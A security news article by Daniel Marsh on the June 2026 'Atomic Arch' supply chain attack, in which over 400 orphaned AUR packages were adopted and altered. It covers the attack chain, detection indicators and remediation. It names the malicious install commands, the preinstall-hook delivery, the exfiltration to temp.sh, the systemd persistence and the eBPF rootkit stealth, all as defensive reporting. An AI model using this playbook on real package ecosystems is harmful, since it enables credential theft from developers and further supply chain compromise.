Arch Linux Packages Compromised: Over 400 Affected in 'Atomic Arch' Attack
arch linuxauratomic archsonatypecybersecuritysupply chain attackrootkitinfostealerlinux securityopen sourcedeveloper securitynpm

Arch Linux Packages Compromised: Over 400 Affected in 'Atomic Arch' Attack

By Daniel MarshJune 12, 2026

The AUR Was Never Safe: What the 'Atomic Arch' Attack on Arch Linux Packages Really Means

The Arch User Repository (AUR) has always presented a unique paradox. On one side, it offers community-driven software, a place to find almost anything for Arch Linux. On the other, it operates with minimal oversight, and anyone in the Arch ecosystem knows the mantra: read the PKGBUILD. This week, that mantra gained new urgency, as over 400 Arch Linux packages in the AUR were compromised in a supply chain attack, dubbed "Atomic Arch" by Sonatype.

The incident has reinforced a long-held understanding within the community: the AUR's community-driven model, while powerful, inherently carries risks. This is not a zero-day in Arch Linux itself, but rather an exploitation of a fundamental trust model for Arch Linux packages. The official Arch repositories remain secure, but the AUR, by design, relies on community vigilance for Arch Linux packages. This incident shows the limits of community vigilance when package scale overwhelms individual auditing efforts.

What Actually Happened: Malicious Packages Emerge

Starting on or around June 11, 2026, attackers took over more than 400 Arch Linux packages in the Arch User Repository. Sonatype named the campaign 'Atomic Arch' (Sonatype-2026-003775, CVSS 8.7). Sonatype initially counted over 20 hijacked packages, but community trackers and AUR git mirror greps quickly pushed that number past 400. The atomic-lockfile npm package, for instance, showed 134 weekly downloads before its removal, though the real exposure came via the AUR build path. Confirmed examples reported to the Arch mailing list include alvr and premake-git. This was not a sophisticated exploit against the AUR infrastructure; it was a social engineering play against the community's trust.

The attackers adopted abandoned or orphaned packages. This is a common practice in open source—a maintainer steps away, and someone else assumes responsibility. The problem is, the new maintainer here was not benevolent. They rewrote the PKGBUILD or .install scripts to pull down and execute malicious code. To appear legitimate, they even spoofed git commit metadata, making it seem as if a long-standing, uncompromised maintainer had made the changes.

If you installed or updated any of these compromised Arch Linux packages on or after June 11, 2026, your system is likely affected.

The Attack Chain: From PKGBUILD to Rootkit

The attack chain unfolded as follows:

  1. Package Adoption: The attackers found orphaned packages in the AUR. These were easily identifiable targets; many popular packages get abandoned.
  2. Malicious PKGBUILD Injection: They modified the PKGBUILD (the build script for Arch Linux packages) or the .install script. These changes were designed to run during the package's build or installation process.
  3. First Wave Payload: The initial modifications added a command like npm install atomic-lockfile. This pulled atomic-lockfile@1.4.2 from npm. This npm package had a preinstall hook that executed a bundled Linux ELF binary named deps.
  4. Second Wave Payload: Later, attackers used different accounts to push bun install js-digest, which delivered a different malicious ELF binary. This shows an evolution in their delivery methods, likely to evade initial detection.
  5. Payload Execution: The deps ELF binary, written in Rust, is the core of the attack. Its main payload SHA-256 is 6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b. It's a credential stealer with an optional eBPF rootkit, designed specifically for developer workstations and build systems.
  6. Data Collection: According to analysis, the malware scrapes:
    • Cookies, tokens, and local storage from Chromium-based browsers (Chrome, Edge, Brave).
    • Session data from Electron apps like Slack, Discord, and Microsoft Teams.
    • GitHub, npm, and HashiCorp Vault tokens.
    • OpenAI/ChatGPT bearer tokens and account metadata.
    • SSH keys, known_hosts, and shell histories.
    • Docker and Podman credentials, plus VPN profiles.
  7. Exfiltration: All this stolen data gets sent over HTTP to temp.sh. For command and control, the malware uses a Tor onion service via a local loopback proxy, making it harder to trace.
  8. Persistence: The malware sets itself up to survive reboots. If it runs as root, it copies itself to /var/lib/ and creates a systemd service unit under /etc/systemd/system/ with Restart=always. If it runs as a normal user, it uses the home directory and a per-user systemd unit under ~/.config/systemd/user/.
  9. Secondary Payload: Analysis also flagged a secondary file tied to monero-wallet-gui as a possible, unanalyzed cryptominer.
  10. eBPF Rootkit (Optional): If the malware gains root privileges, it can load an eBPF rootkit. This is not for privilege escalation; it's for stealth. It hides the malware's processes, names, and socket inodes from standard system tools. It also kills any attempts to attach a debugger. A full system reinstallation becomes essential if you're compromised as root.

Assessing the Damage: Developer Workstations at Risk

The practical impact of this attack is substantial, especially for developers and anyone using Arch Linux as their primary workstation. The risk extends far beyond browser history; it means losing access to critical development credentials.

Consider the implications: GitHub tokens, npm credentials, Vault tokens, SSH keys. These are the assets that enable attackers to move laterally, compromise repositories, inject more malicious code into other projects, or access sensitive cloud infrastructure. An attacker with this access could forge tokens for any tenant in the environment, or push malicious commits to projects you maintain.

The optional eBPF rootkit is particularly insidious. If it loads, standard detection tools will not even see the malware running. This renders detection extremely challenging.

What We Do Now: Rebuilding Trust and Fortifying Defenses

Arch Linux maintainers, including Jonathan Grotelüschen, are actively working to identify and remove malicious commits, ban associated accounts, and request user reports for suspect Arch Linux packages. This immediate response is necessary.

For users, the steps are direct and mandatory. First, identify potential compromise. Check any AUR package installed or updated on or after June 11, 2026. Community-curated lists and detection scripts are available to aid in this process.

You should also grep your recent build history and caches for npm install atomic-lockfile, bun install js-digest, and the payload path src/hooks/deps. Look for unknown systemd services under /etc/systemd/system/ and ~/.config/systemd/user/, and inspect /sys/fs/bpf/ for pinned BPF maps named hidden_pids, hidden_names, and hidden_inodes. Finally, review outbound connections for anything directed to Tor or temp.sh.

If a flagged package ran, assume the host is credential-compromised. Rotating all touched credentials is paramount: browser sessions, SSH keys, GitHub/npm tokens, Slack/Teams/Discord sessions, Vault tokens, Docker/Podman credentials, and any cloud keys must be reset.

If the package ran with root privileges, a full system reinstallation from trusted media is required. The eBPF rootkit, if loaded, makes cleaning notoriously difficult, far more so than traditional rootkits. Attempting to clean it without a full reinstall is a high-risk proposition.

Going forward, a change in habits is required. You must read the PKGBUILD and any .install hooks before building, especially for recently adopted or suddenly active packages. This incident underscores the critical importance of reviewing PKGBUILDs for Arch Linux packages.

This "Atomic Arch" attack is not new in its tactic; we saw similar adoption tactics in 2018 with a PDF-viewer package. What's different is the scale and the sophistication of the payload. It indicates that supply chain attacks are evolving, inheriting trust from open-source ecosystems.

The AUR's community model is its strength, but also its greatest vulnerability. This incident highlights the inherent challenges of relying on implicit trust and manual verification in large open-source ecosystems. The scale of this attack underscores the growing need for advanced tooling and more robust community review mechanisms to manage trust effectively in supply chains for Arch Linux packages.

Daniel Marsh
Daniel Marsh
Former SOC analyst turned security writer. Methodical and evidence-driven, breaks down breaches and vulnerabilities with clarity, not drama.